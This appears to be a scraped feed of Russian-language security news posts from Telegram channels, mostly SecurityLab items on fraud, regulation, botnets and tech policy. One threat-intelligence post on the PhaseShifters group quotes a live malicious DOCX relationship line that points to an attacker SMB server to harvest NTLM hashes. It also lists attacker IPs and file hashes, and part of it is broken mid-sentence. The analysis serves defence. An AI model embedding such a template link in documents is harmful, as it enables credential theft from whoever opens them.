66550
SecurityLab — ваш надежный проводник в мире кибербезопасности, технологий и науки. РКН: https://vk.cc/cFXCkO Наши каналы: https://t.me/addlist/G_0tnwZJOrA3MzEy Голосуйте за канал: https://t.me/SecLabNews?boost
Пенсионерка из Самары перевела аферистам рекордную сумму
🏦 Бывший руководитель Корпорации развития Самарской области сняла в банке ВТБ 350 млн рублей и $800 тысяч, передав их телефонным аферистам.
❌ Сотрудники банка несколько дней пытались отговорить 71-летнюю Ольгу Серову от снятия огромной суммы, но женщина настояла на своём решении.
🤐 Пострадавшая отказалась комментировать ситуацию и обсуждать детали инцидента, который стал одним из крупнейших случаев телефонного мошенничества в России.
#мошенничество #социальнаяинженерия #банки #cybersecurity
@SecLabNews
Стиль гадюки 🐍
Может ли злоумышленник использовать всем известные инструменты и оставаться незамеченным более полутора лет? Наш ответ — да.
В середине октября 2024 года департамент киберразведки экспертного центра безопасности Positive Technologies (PT Expert Security Center) зафиксировал таргетированную рассылку Revenge RAT, нацеленную на сотрудников финансовых подразделений российских компаний.
Особое внимание привлекли необычные африканские названия управляющей инфраструктуры злоумышленников. Углубившись в исследование, мы выявили и отследили новую, ранее не описанную APT-группировку, атакующую российские компании как минимум с мая 2023 года.
В связи с использованием африканских названий, регулярными обновлениями семплов и приманок, «пятнистостью» названий вредоносных файлов и продолжительной скрытностью в киберпространстве мы назвали группировку DarkGaboon — в честь африканской габонской гадюки, которую можно встретить в окрестностях стратовулкана Килиманджаро.
😏 Подробнее о группировке и ее техниках вы можете прочитать в исследовании на нашем сайте.
#TI #APT #Malware
@ptescalator
Лайк в сети, срок в реальности? Что готовит инициатива властей
📢 Правительственная комиссия поддержала инициативу Минюста об ужесточении наказания за разжигание ненависти или вражды. Теперь уголовная ответственность будет наступать уже при первом нарушении, без предварительного административного наказания.
💻 В 2024 году почти половина из 734 административных дел по статье о разжигании ненависти касалась одобрения насилия в интернете. Штрафы за подобные нарушения могут достигать 500 000 рублей, а в некоторых случаях предусмотрено лишение свободы на срок от двух до пяти лет.
⚡️ Эксперты отмечают, что новая редакция закона может привести к увеличению числа уголовных дел. При этом остаются нераскрытыми ключевые понятия, такие как «вражда», «ненависть» и «социальная группа».
#законодательство #УК_РФ #экстремизм #интернет
@SecLabNews
🕵♂️ 100 стран вооружились хакерскими программами для взлома смартфонов
🌍 Около 100 государств закупили продвинутое шпионское ПО для взлома смартфонов, причем доступ к нему получили не только спецслужбы, но и частники.
💻 Спрос на цифровые инструменты слежки взлетел до небес – теперь даже начинающие хакеры могут использовать простые в управлении программы по принципу «включил и работай».
🏢 Израильская NSO Group, создатель печально известного Pegasus, попала под санкции США вместе с Intellexa и Cytrox за продажу ПО, использованного против журналистов и дипломатов.
Мечта каждого параноика сбылась: теперь за вами действительно следят, причем совершенно легально и с корпоративной гарантией.
#кибербезопасность #шпионскоеПО #Pegasus #приватность
@SecLabNews
🕵♂️ Европол требует от IT-гигантов открыть «чёрный ход» в системах шифрования
👀 Глава Европола Катрин Де Болле планирует встречи с технологическими компаниями в рамках форума в Давосе. Она намерена убедить их предоставить правоохранительным органам доступ к зашифрованным сообщениям преступников.
🛡 По мнению руководителя Европола, компании несут социальную ответственность за содействие полиции в расследованиях. Де Болле подчеркивает, что без доступа к зашифрованным данным обеспечение демократических принципов становится невозможным.
❌ Эксперты по цифровым правам выступают против инициативы Европола, указывая на риски массовой слежки. Технические специалисты предупреждают, что создание backdoor в системах шифрования может привести к появлению черного рынка действительно защищенных приложений.
#Кибербезопасность #Приватность #Европол #шифрование
@SecLabNews
🕵♂️ Трамп делает разворот на 180°: TikTok в США разблокируют в день инаугурации
📱После суточной блокировки TikTok снова станет доступен американцам - Трамп подпишет указ о разблокировке сразу после вступления в должность.
🤝 Новая схема управления платформой предполагает создание совместного предприятия с равным распределением акций между правительством США и текущими владельцами.
💼 Руководство TikTok уже выразило благодарность за поддержку и начало процесс восстановления работы сервиса в стране.
В то время как одни страны запрещают TikTok, Америка решила его... удочерить. Видимо, лучший способ контролировать то, что нельзя победить - это стать его акционером.
#TikTok #США #Трамп #Кибербезопасность
@SecLabNews
🕵♂️ Запрет TikTok в США: между безопасностью и цифровой цензурой
📉 США официально заблокировали TikTok, назвав его угрозой безопасности. Верховный суд поддержал решение, вызвавшее волну протестов, особенно среди молодых пользователей.
💡 TikTok изменил моду, музыку, еду и образование. Алгоритмы платформы подстроились под вкусы миллионов, создавая тренды и культурные феномены.
🔐 Цензура вместо свободы слова? Запрет вызвал вопросы о демократических принципах, ведь TikTok был не только площадкой для развлечений, но и для выражения идей.
В попытке защититься от "китайской угрозы" США невольно позаимствовали любимый метод Поднебесной - просто взять и запретить все, что кажется подозрительным.
#TikTok #конфиденциальность #нацбезопасность #цифроваяэтика @SecLabNews
🕵♂️ «Госуслуги» станут спасательным кругом: новая кнопка SOS уже на подходе
🆘 Минцифры России поддержало инициативу депутата Дмитрия Гусева о добавлении кнопки экстренной помощи на портале «Госуслуги». Новая функция будет работать по аналогии с номером «112», обеспечивая прямую связь с экстренными службами.
🔄 В Курской области уже были апробированы сервисы для чрезвычайных ситуаций, включая поиск пропавших и запрос эвакуации. Этот опыт ляжет в основу типового решения для всех регионов России.
⚡️Для реализации проекта потребуется модернизация информационных систем МЧС, МВД, ФСБ, Росгвардии и Минздрава. Также будут разработаны специальные алгоритмы действий для каждого ведомства при получении сигналов через новую систему.
#Госуслуги #Безопасность #ЦифровизацияРоссии #ЭкстреннаяПомощь
@SecLabNews
🕵♂️ Указ Байдена меняет стандарты кибербезопасности США
💼 Президент США Джо Байден подписал указ, направленный на усиление кибербезопасности. Документ расширяет полномочия федеральных агентств и вводит новые требования для IT-подрядчиков. Особое внимание уделено защите критической инфраструктуры, включая школы, больницы и энергетический сектор.
💻 Документ обязывает компании, работающие с правительством, следовать высоким стандартам безопасности. Национальный институт стандартов и технологий займётся разработкой методик проверки соответствия. Без выполнения этих требований поставщики ПО не смогут участвовать в государственных закупках.
🤖Искусственный интеллект и квантовые технологии станут частью новых мер. ИИ будет использоваться для поиска и устранения уязвимостей, а алгоритмы устойчивой криптографии защитят федеральные системы. Указ также упрощает процесс наложения санкций на киберпреступников.
#кибербезопасность #США #указБайдена #цифроваязащита
@SecLabNews
🕵♂️ OpenText Corporation объявлена нежелательной в России
🔍 Генпрокуратура РФ признала канадскую OpenText Corporation нежелательной организацией. Компания обвиняется в тесном сотрудничестве с силовыми структурами США и участии в антироссийской пропагандистской кампании.
🛡 OpenText Corporation владеет популярным SIEM-продуктом ArcSight, который широко использовался в российских компаниях. Решение применялось для защиты IT-инфраструктуры и мониторинга инцидентов безопасности.
⚠️ Компания прекратила свою деятельность в России еще в марте 2022 года. Среди известных клиентов OpenText были такие компании как L'Oreal и Heineken.
#кибербезопасность #SIEM #ArcSight #OpenText
@SecLabNews
Telegram под наблюдением: ИИ раскрывает авторов сообщений
🔍 Российский разработчик создал обновленную версию ИИ-инструмента Apparatus Sapiens для анализа контента в Telegram. Система способна не только находить потенциально опасные сообщения, но и определять их авторов, анализируя более 22 миллионов чатов.
🤖 Инструмент использует продвинутые алгоритмы для оценки «окраса» сообщений и выявления признаков противоправной деятельности. После обнаружения подозрительного контента система может провести деанонимизацию автора, определив его геолокацию, телефонный номер и другие идентификаторы.
📊 База данных системы содержит информацию о 58 миллионах пользователей Telegram, включая их телефонные номера. В случае если точная идентификация невозможна, система выгружает полную историю сообщений пользователя, изменений его профиля и связей для последующего ручного анализа.
#ИскусственныйИнтеллект #Безопасность #Telegram #АнализДанных
@SecLabNews
🕵♂️В режиме ожидания: 21 регион России столкнулся с проблемами интернета
🔌 В Татарстане произошел обрыв магистрального кабеля на участке между населенными пунктами Тюлячи и Новая Тура. Это привело к деградации услуг ШПД и ухудшению качества интернет-соединения для примерно 3,8 млн пользователей в 21 регионе России.
⏰ По информации Роскомнадзора, ориентировочное время полного восстановления связи — 21:00 по московскому времени. Точный перечень затронутых регионов ведомство не раскрыло.
⚡️ Этот сбой стал вторым крупным инцидентом за последние сутки. Накануне пользователи разных операторов жаловались на недоступность сайтов и мобильных приложений, что Роскомнадзор связал с кратковременным нарушением связности в Рунете.
#интернетсбой #Татарстан #РКН #цифроваяинфраструктура
@SecLabNews
ИИ против программистов: планы Meta на 2025 год
🤖 В подкасте The Joe Rogan Experience Марк Цукерберг сообщил о разработке ИИ для замены инженеров среднего звена. «Вероятно, в 2025 году у нас в Meta*, как и у других компаний, работающих в этом направлении, появится ИИ, который фактически сможет выполнять роль инженера среднего звена и писать код», — заявил он.
💰 Текущая средняя зарплата инженеров среднего звена в Meta составляет несколько сотен тысяч долларов в год. Хотя Цукерберг не говорит напрямую о сокращении персонала, его заявление намекает на возможные изменения для разработчиков.
👀 Глава Meta отметил, что в будущем большая часть кода будет создаваться ИИ-инженерами, а не людьми. При этом он подчеркнул, что новая технология скорее дополнит специалистов, позволив им заниматься «более смелыми задачами».
* Компания Meta и её продукты признаны экстремистскими, их деятельность запрещена на территории РФ.
#Meta #ИИ #программисты #будущее
@SecLabNews
🕵♂️ Рунет замер: глобальный сбой оставил миллионы без интернета
😱 Массовые перебои интернета: пользователи России жалуются на сбои у разных провайдеров.
🚫 Ключевые сервисы недоступны: Google, Википедия, Outlook и банковские приложения не работают.
🌍 Без проблем за рубежом: зарубежные пользователи продолжают пользоваться всеми сервисами.
📡 В Роскомнадзоре заявили, что не знают причин падения интернета в России.
#сбой #интернет #новости @SecLabnews
Шантаж телефонных мошенников унес жизнь юного физика
😰 Первокурсник физтеха Петр Ветчинкин провел последние часы жизни под непрерывным давлением телефонных мошенников. Преступники несколько часов манипулировали молодым человеком, угрожая его семье и обвиняя в экстремизме.
💸 Мошенники вынудили студента оформить несколько кредитов и перевести деньги на «безопасный счет». После длительного психологического прессинга юноша вышел из дома и больше не отвечал на звонки.
⚡️ Трагедия стала частью волны преступлений телефонных террористов в конце 2024 года. За короткий период было зафиксировано 55 попыток поджогов и подрывов по всей России.
#мошенники #трагедия #МФТИ #телефонныйтеррор
@CyberStrikeNews
Мегапроект Stargate: $500 млрд на дата-центры ИИ в США
🚀 В Белом доме объявили о старте амбициозного проекта Stargate - OpenAI, SoftBank и Oracle построят сеть мощнейших дата-центров ИИ, начиная с Техаса.
💰 На проект планируют потратить полтриллиона долларов за 4 года, создав сотни тысяч рабочих мест и укрепив технологическое лидерство США.
⚡️ Первый центр в Абилине будет потреблять энергии как 750 тысяч домов, а команда уже работает над собственным ИИ-чипом к 2026 году.
В Техасе теперь будет не только всё большое, но и умное - ковбои могут начинать учить промпты...
#AI #OpenAI #Stargate #DataCenter
@SecLabNews
После 9 лет заключения: создатель Silk Road вновь на свободе
🙃 Дональд Трамп помиловал Росса Ульбрихта, отбывавшего пожизненное заключение с 2015 года. Это решение стало исполнением предвыборного обещания и получило широкую поддержку криптовалютного сообщества, инвестировавшего более $100 миллионов в кампанию.
💻 Созданная Ульбрихтом платформа Silk Road за три года работы провела транзакции на сумму более $200 миллионов и стала пионером в использовании биткоина для торговли. Несмотря на серьёзность обвинений, включая организацию наркоторговли, многие влиятельные фигуры, в том числе Илон Маск, поддерживали его освобождение.
⚖️ Федеральный суд ранее называл Ульбрихта «ключевой фигурой в глобальной цифровой наркоторговле», однако суровость приговора вызывала споры в обществе. В прошлом году Трамп активно поддерживал дело Ульбрихта на предвыборных мероприятиях, разместив хэштег #FreeRossDayOne на Truth Social.
#трамп #криптовалюта #ульбрихт #silkroad
@SecLabNews
🕵♂️ Ресурсы «Ростелекома» подверглись атаке через подрядчика
🔍 В ответ на анонимные сообщения о возможной утечке данных «Ростелеком» сообщил, что ранее были зафиксированы инциденты информационной безопасности у подрядчика. Наиболее вероятно, что утечка произошла именно из инфраструктуры подрядчика, обслуживавшего интернет-ресурсы компании.
⚠️ Под угрозой оказались данные с сайтов company.rt.ru и zakupki.rostelecom.ru. Компания подчеркнула, что эти ресурсы не предназначены для обслуживания физических лиц и не содержат персональных данных частных клиентов.
🛡 По предварительной информации, утечка особо чувствительных персональных данных не зафиксирована. Пользователям рекомендуется сбросить пароли и активировать двухфакторную аутентификацию, если эта функция доступна.
#кибербезопасность #утечкаданных #Ростелеком #информационнаябезопасность
@SecLabNews
🕵♂️ Каждый четвертый школьник использует ChatGPT
🔄 За последний год доля школьников, применяющих ChatGPT в учебе, выросла вдвое и достигла 26%, показало исследование Pew Research Center.
📊 Больше половины подростков одобряют использование ИИ для изучения новых тем, но лишь 18% считают приемлемым писать с его помощью эссе.
🌐 Помимо ChatGPT, ученики осваивают новые ИИ-инструменты — Gemini, Claude и Microsoft Copilot, а общий уровень использования ИИ среди студентов достиг 86%.
Похоже, искусственный интеллект превращается из запретного плода в незаменимого помощника, как когда-то калькулятор. Важно научиться использовать его возможности, не позволяя ему думать за нас.
#ChatGPT #ИскусственныйИнтеллект #Образование
@SecLabNews
👀 Как хакеры становятся невидимыми для систем безопасности?
В новом выпуске рубрики HACK ATT&CK мы продолжаем разбирать тактику Defense Evasion из матрицы MITRE ATT&CK.
Расскажем:
✅ LOLBins. Как злоумышленники используют легитимные системные файлы для вредоносных целей.
✅ Impair Defenses. Тактика отключения или модификации защитных инструментов.
✅ Process Injection. Внедрение вредоносного кода в легитимные процессы.
Смотрите выпуск на любой из платформ:
📺 YouTube
📺 RuTube
📺 VK Видео
📝 Дзен
Узнайте, как злоумышленники применяют эти методы на практике. Приятного просмотра!
@SecLabNews
Cоздатель Telegram ответил на обвинения французского суда
👨⚖️ Павел Дуров провёл 10 часов во французском суде, отвечая на вопросы двух следственных судей. В конце августа 2024 года создателю Telegram были предъявлены обвинения по 16 различным пунктам, связанным с подозрением в соучастии в совершении преступлений.
⚖️ Мессенджер начал активно сотрудничать с правоохранительными органами, передав данные 10 000 пользователей по всему миру. За месяц после ареста Дурова Telegram ответил на все запросы французского Управления по делам несовершеннолетних, что составило около сотни обращений.
🛡 Платформа ежемесячно блокирует от 15 до 20 миллионов аккаунтов за нарушение правил по всему миру. При этом Дуров заверил суд, что запрещённый контент удаляется в день обнаружения, а компания сотрудничает с организациями по борьбе с эксплуатацией детей.
#Telegram #Дуров #Безопасность #Модерация
@SecLabNews
🕵♂️ FreeOurFeeds: спасение соцсетей от миллиардеров
🔍 Цель проекта — создание независимой экосистемы социальных платформ. Группа культурных деятелей и экспертов запускает инициативу FreeOurFeeds на базе протокола AT для децентрализации данных.
🌟 Участники — Марк Руффало, Алекс Уинтер, Кори Доктороу и другие. К проекту присоединились писатели, музыканты и основатели ключевых интернет-ресурсов, таких как Википедия.
💰 План — собрать 30 млн долларов за три года. Первым этапом стал краудфандинг через GoFundMe для формирования общественного фонда.
Когда богатые спасают интернет от ещё более богатых, это похоже на сюжет из антиутопии. Но вдруг они на этот раз действительно перепишут правила игры?
#интернет #технологии #соцсети #FreeOurFeeds @SecLabNews
🌑 Что скрывает темная сторона интернета?
Прольем свет на темную сторону интернета
Дарквеб для хакеров — это не просто набор анонимных сайтов, а разветвленная экосистема, где свои правила, инструменты и экономика. Здесь продается все — от вредоносного ПО до доступа к системам, — а конкуренция может быть жестче, чем в легальном бизнесе.
На вебинаре мы впервые расскажем, как на самом деле устроен рынок киберпреступности.
Обсудим:
🔴механизмы проведения сделок в дарквебе;
🔴экономику угроз: цены и тренды на вредоносное ПО, эксплойты, доступы и услуги;
🔴методы конкуренции: почему отзывы важны, как рекламные акции влияют на популярность и зачем некоторые продавцы создают кастомизированные лендинги;
🔴будущее дарквеба.
Ждем вас на вебинаре! Регистрация обязательна.
🕵♂️ Тысячи роутеров MikroTik стали частью вредоносной сети
✔️ Специалисты Infoblox обнаружили сеть из 13 000 скомпрометированных маршрутизаторов MikroTik. Злоумышленники использовали эти устройства для рассылки фишинговых писем, маскируясь под DHL Express.
😵💫 Атакующие эксплуатировали уязвимость в настройках SPF-записей с параметром «+all», затронувшую около 20 000 доменов. Эта ошибка конфигурации позволяла любому серверу отправлять письма от имени легитимных доменов.
‼️Зараженные устройства использовались как прокси-серверы SOCKS4 для проведения DDoS-атак и кражи данных. Летом 2024 года этот ботнет уже был замечен в рекордной DDoS-атаке мощностью 840 Mpps на инфраструктуру OVHcloud.
#кибербезопасность #MikroTik #ботнет #фишинг
@SecLabNews
🤝 Как наладить взаимодействие ИБ и IT?
«Да кому сдалось нас атаковать?» — часто слышите такое от коллег? Споры между ИБ и IT — одна из причин, почему уязвимости остаются неустраненными.
На практикуме «Управление уязвимостями: от теории к практике» вы узнаете:
🔴Как строить диалог между ИБ и IT так, чтобы задачи решались, а не откладывались;
🔴Как распределять роли в процессе управления уязвимостями;
🔴Какие инструменты и подходы использовать, чтобы наладить взаимодействие внутри команды.
Разберите эту головоломку на практикуме и получите рабочие инструменты для ее решения.
✍️ Записаться на практикум
🕵♂️ SourceCraft: экосистема разработки с российской пропиской
🚀«Яндекс» планирует в феврале запустить в режиме технического превью платформу SourceCraft , аналог американской GitLab. Первым инструментом станет Yandex Code Assistant — ИИ-помощник для написания кода.
🛠 Платформа предложит полный набор инструментов для разработки, включая систему контроля версий и CI/CD. SourceCraft объединит все необходимые средства для безопасной разработки, аудита и мониторинга проектов в едином интерфейсе.
🌍 GitLab ранее широко использовался для совместной разработки, но с 2019 года ограничил доступ для сотрудников из России и Китая. В 2022 году сервис полностью прекратил работу с новыми бизнесами из России и Белоруссии.
#SourceCraft #Яндекс #разработка #GitLab
@SecLabNews
Ваш хеш, пожалуйста… Спасибо! 🙏
В начале января мы обнаружили файл, который привлек внимание своим содержанием и структурой. Исследование метаданных документа, а также используемых техник соединения с сервером по протоколу SMB через DOCX-файлы позволило установить связь с хакерской группировкой PhaseShifters. Информацию о ней мы публиковали в статье в ноябре 2024 года (рисунок 1). В этой статье также подробно описаны взаимосвязи с группировкой UAC-0050, о которой пойдет речь далее.
🆕 С2-сервер новый, подход старый
Первый файл, про который хочется поговорить, — декой. Он содержит фотографию (рисунок 2) документа, якобы принадлежащего одной компании в сфере военно-промышленного комплекса (создание БПЛА).
Как и в предыдущих атаках, внутри документа есть ссылка-шаблон, с помощью которой происходит получение хеш-сумм NTLM пользователя. Такая техника называется Forced Authentication: посредством шаблона или взаимосвязей с внешними сущностями устройство устанавливает соединение с сервером злоумышленников по протоколу SMB, из-за чего Windows автоматически пытается провести аутентификацию на этом ресурсе.
В файле присутствует обращение к SMB-ресурсу на внешнем сервере 45.155.249.126. Активность сервера наблюдается с ноября 2024 года, соединение происходит через механизм связей (relations) частей WordprocessingML-документа:
<ns0:Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="file://\\45.155.249.126\19i6LJ4qNx81SkAFg4mtUbf5.png" TargetMode="External" /></ns0:Relationships>
31.214.157.167) злоумышленников — АО-******- -12904ДО.docx. Этот документ был задействован в атаках с использованием Ozone RAT и Darktrack RAT, которые также описаны у нас в статье (рисунок 1).31.214.157.0/24, можно определить как минимум еще один IP-адрес, который замечен в подобных инцидентах, — 31.214.157.49. Этот сервер задействовался в атаках как PhaseShifters (например, ГВПК ответ цифровому развитию.docx), так и UAC-0050 (с использованием домена tax-gov-ua.com). Напомним, что сходства этих двух группировок все еще требуется тщательно исследовать.45.155.249.126
31.214.157.167
31.214.157.49
3172bf0dd76232fc633214f0ba92b25d27b136a2ed5d9e4e7d06b0686ef4d34c
3eca76737c6aee34b4c38845fde13bceed23a31d39e958893a44f42380ff84d5
fd50307b7f08d037c5d37f2505c8de6edc9c57e1843f4434309a135f4b43ff5c
5061e83a380a9c3ebe91bd5de80fe8f11b666a182efbebe13a1b0dfbc2842487
4200 компьютеров под управлением PlugX: ФБР вмешалось
👮♀️ ФБР провело специальную операцию по удалению вредоносного ПО PlugX с 4200 компьютеров в США. Вредонос использовался хакерской группой «Mustang Panda» для кражи данных и удалённого доступа к системам жертв.
🕷 Вредоносная программа распространялась через USB-накопители и действовала с 2012 года, атакуя компьютеры по всему миру. По данным ФБР, только с сентября 2023 года около 45 000 IP-адресов в США обращались к командному серверу вредоноса.
⚡️ В ходе операции ФБР использовало собственные механизмы вредоноса для его деактивации, работая совместно с французскими правоохранителями. Специальное командное сообщение заставило PlugX удалить все созданные файлы и полностью прекратить работу.
#PlugX #кибератака #ФБР #кибербезопасность
@SecLabNews
🕵♂️ До 7 лет тюрьмы за слив банковской и налоговой информации
📊 Минфин разработал законопроект об ужесточении ответственности за разглашение коммерческой, налоговой и банковской тайны. Документ уже одобрен комиссией правительства по законопроектной деятельности и готовится к рассмотрению в Госдуме.
💰 Верхний порог наказания увеличится до лишения свободы на срок от двух до пяти лет со штрафом до 5 млн рублей. За деяния с «тяжкими последствиями» предусмотрено наказание в виде лишения свободы на срок от трех до семи лет.
🔐 В ходе борьбы с утечками информации выявлено 65 интернет-ресурсов, предоставляющих доступ к конфиденциальным данным. Несмотря на их блокировку, черный рынок такой информации продолжает расти.
#кибербезопасность #законопроект #защитаданных #Минфин
@SecLabNews
🕵♂️ Цукерберг: даже сквозное шифрование не защитит WhatsApp от спецслужб
🔐Марк Цукерберг подтвердил, что спецслужбы могут получить доступ к зашифрованным сообщениям при физическом доступе к устройству. При этом он подчеркнул, что сами протоколы шифрования WhatsApp и Signal остаются надёжными и идентичными.
💬 Обсуждая ситуацию с Такером Карлсоном, глава Meta* предположил, что спецслужбы получили доступ именно к устройству журналиста, а не к серверам Signal. Он пояснил, что архитектура WhatsApp построена так, что даже сама компания не имеет доступа к содержимому переписки пользователей.
⏳WhatsApp внедрил функцию исчезающих сообщений для дополнительной защиты пользовательских данных. Цукерберг отметил, что даже при взломе устройства эта функция создаёт дополнительный уровень безопасности, позволяя автоматически удалять переписку через заданный промежуток времени.
*Meta признана экстремистской организацией и запрещена в РФ
#кибербезопасность #WhatsApp #Signal #приватность
@SecLabNews